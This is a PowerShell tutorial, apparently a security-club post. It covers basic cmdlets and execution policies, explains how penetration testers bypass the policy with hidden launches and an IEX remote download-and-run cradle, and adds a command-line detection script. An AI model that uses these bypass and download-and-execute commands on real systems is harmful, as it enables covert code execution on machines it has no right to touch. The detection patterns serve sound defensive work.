PowerShell foundation

Windows PowerShell is a command-line shell and scripting environment built into Windows 7 and later. It lets command-line users and script writers take advantage of the .NET Framework. PowerShell can run directly in memory and can be used as an extension of the command prompt, cmd.exe.
View PowerShell version information:
Get-Host or $PSVersionTable.PSVersion
Basic concepts
1. .ps1 file

A PowerShell script is simply a text file containing multiple PowerShell commands, with each command on its own line.
2. Execution policy
To prevent malicious scripts from running, PowerShell has an execution policy, which is set to Restricted by default.
When a PowerShell script cannot be executed, use the following cmdlet to check the current execution policy:
Get-ExecutionPolicy
3. Run the script
C:\test\1.ps1
.\2.ps1
4. Pipe
The output of the previous command is used as the input of the next command.
Suppose you need to stop all currently running programs whose names start with "p":
get-process p* | stop-process
1. Basic commands

Take file operations as an example.
1. New directory
New-Item whitecellclub -ItemType Directory
2. New file
New-Item light.txt -ItemType File
3. Delete directory
Remove-Item whitecellclub
4. Display file content
Get-Content test.txt
5. Set the text content
Set-Content test.txt -Value "Hello World!"
6. Add content
Add-Content light.txt -Value "i love you"
7. Clear content
Clear-Content test.txt
2. Execution policy
Get the execution policy:
Get-ExecutionPolicy
The policies are divided into the following types:
Restricted: scripts cannot be executed (default)
RemoteSigned: scripts created locally can be run, but scripts downloaded from the Internet cannot be run unless they are signed with a digital certificate.
AllSigned: scripts run only when they are signed by a trusted publisher.
Unrestricted: all scripts are allowed to run
The PowerShell execution policy can be set with the following command:
Set-ExecutionPolicy
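As an added example (not from the original post), the following PowerShell shows the policy at each scope, changes it for the current user only, and shows how RemoteSigned tells a locally created script from a downloaded one. The file names under $env:TEMP are constructed for the demonstration.

```powershell
# Added example (not from the original post): inspect the execution policy at
# every scope and show how RemoteSigned decides whether a script counts as
# "downloaded from the Internet". File names under $env:TEMP are constructed.

# 1. The effective policy is the first non-Undefined entry in precedence order.
Get-ExecutionPolicy -List | Format-Table -AutoSize
"Effective policy: $(Get-ExecutionPolicy)"

# 2. Change the policy for the current user only (no administrator rights
#    needed). RemoteSigned lets local scripts run but still blocks unsigned
#    downloaded scripts.
Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Scope CurrentUser -Force

# 3. A script created locally carries no Zone.Identifier stream, so it runs.
$local = Join-Path $env:TEMP 'local-demo.ps1'
Set-Content -Path $local -Value '"hello from a local script"'
& $local

# 4. A downloaded file is marked by the browser with a Zone.Identifier
#    alternate data stream (ZoneId=3 means Internet zone). Writing the stream
#    by hand reproduces that mark for the demonstration.
$downloaded = Join-Path $env:TEMP 'downloaded-demo.ps1'
Set-Content -Path $downloaded -Value '"hello from a downloaded script"'
Set-Content -Path $downloaded -Stream Zone.Identifier -Value "[ZoneTransfer]`r`nZoneId=3"

# Inspect the mark: Get-Item -Stream lists the file's alternate data streams.
Get-Item -Path $downloaded -Stream * | Select-Object Stream, Length

# Under RemoteSigned the marked script is rejected as "not digitally signed".
try { & $downloaded } catch { "Blocked: $($_.Exception.Message)" }

# 5. After reviewing the file, an administrator can clear the mark.
Unblock-File -Path $downloaded
& $downloaded
```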
At the command line, enter powershell to open the PowerShell prompt, and enter help to view the help information.

3. Executing scripts by bypassing the policy

To run a PowerShell script normally, the Restricted policy must be changed to Unrestricted with administrator privileges. Therefore, during a penetration test, some method of bypassing the policy is needed in order to execute a script.
1. Bypass the policy with a local execution
Upload xxx.ps1 to the target server and execute the script locally on the target server from the CMD environment:
PowerShell.exe -ExecutionPolicy Bypass -File xxx.ps1
2. Bypass the policy with a hidden local execution
PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoLogo -NonInteractive -NoProfile -File xxx.ps1
3. Use IEX to download and run a remote PS1 script, bypassing the policy
PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -NonI IEX (New-Object Net.WebClient).DownloadString("xxx.ps1");[parameters]
The parameters used in the above commands:
-ExecutionPolicy Bypass: bypasses the execution policy. This parameter is very important: by default PowerShell's policy does not allow scripts to run, and setting this parameter skips that check. In penetration testing, this parameter is used almost every time a PowerShell script is run.
-WindowStyle Hidden: hides the window
-NoLogo: starts PowerShell without displaying the copyright banner
-NonInteractive (-NonI): non-interactive mode; PowerShell does not present interactive prompts to the user
-NoProfile (-NoP): the PowerShell console does not load the current user's profile
-NoExit: does not exit the shell after execution. This is very important when using scripts such as keyloggers.
PowerShell scripts cannot be run directly by default; the three methods above bypass the execution policy so that PowerShell scripts can run.
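From the defensive side, an added example (not from the original post) that scores PowerShell command lines against the launch switches listed above and then applies the same check to running processes. The sample command lines are constructed; the process scan uses the Win32_Process CIM class.

```powershell
# Added example (not from the original post): flag PowerShell command lines
# that combine the launch switches described above. Sample command lines are
# constructed; the last section applies the same check to live processes.

# PowerShell accepts any unambiguous prefix of a switch, so match prefixes.
$patterns = @{
    ExecutionPolicyBypass = '(?i)-e\w*\s+bypass'
    HiddenWindow          = '(?i)-w\w*\s+hidden'
    NoProfile             = '(?i)-nop\w*'
    NonInteractive        = '(?i)-noni\w*'
    DownloadCradle        = '(?i)(iex|invoke-expression).*(downloadstring|downloadfile)'
}

function Test-SuspiciousPowerShell {
    param([Parameter(Mandatory)][string]$CommandLine)
    $hits = foreach ($name in $patterns.Keys) {
        if ($CommandLine -match $patterns[$name]) { $name }
    }
    # Bypass alone is common in admin tooling; a hidden window and a download
    # cradle on top of it is the combination worth an analyst's attention.
    [pscustomobject]@{
        CommandLine = $CommandLine
        Indicators  = @($hits)
        Score       = @($hits).Count
        Suspicious  = (@($hits).Count -ge 3)
    }
}

# Constructed samples: a routine admin invocation and a suspicious one.
$samples = @(
    'powershell.exe -ExecutionPolicy Bypass -File C:\ops\backup.ps1',
    'powershell.exe -ep bypass -w hidden -nop -noni IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/x.ps1")'
)
$samples | ForEach-Object { Test-SuspiciousPowerShell -CommandLine $_ } |
    Format-Table Suspicious, Score, Indicators -AutoSize

# Apply the same check to PowerShell processes running right now.
Get-CimInstance Win32_Process -Filter "Name = 'powershell.exe' OR Name = 'pwsh.exe'" |
    Where-Object CommandLine |
    ForEach-Object { Test-SuspiciousPowerShell -CommandLine $_.CommandLine } |
    Where-Object Suspicious
```

The first sample scores 1 (bypass only) and is not flagged; the second scores 5 and is flagged.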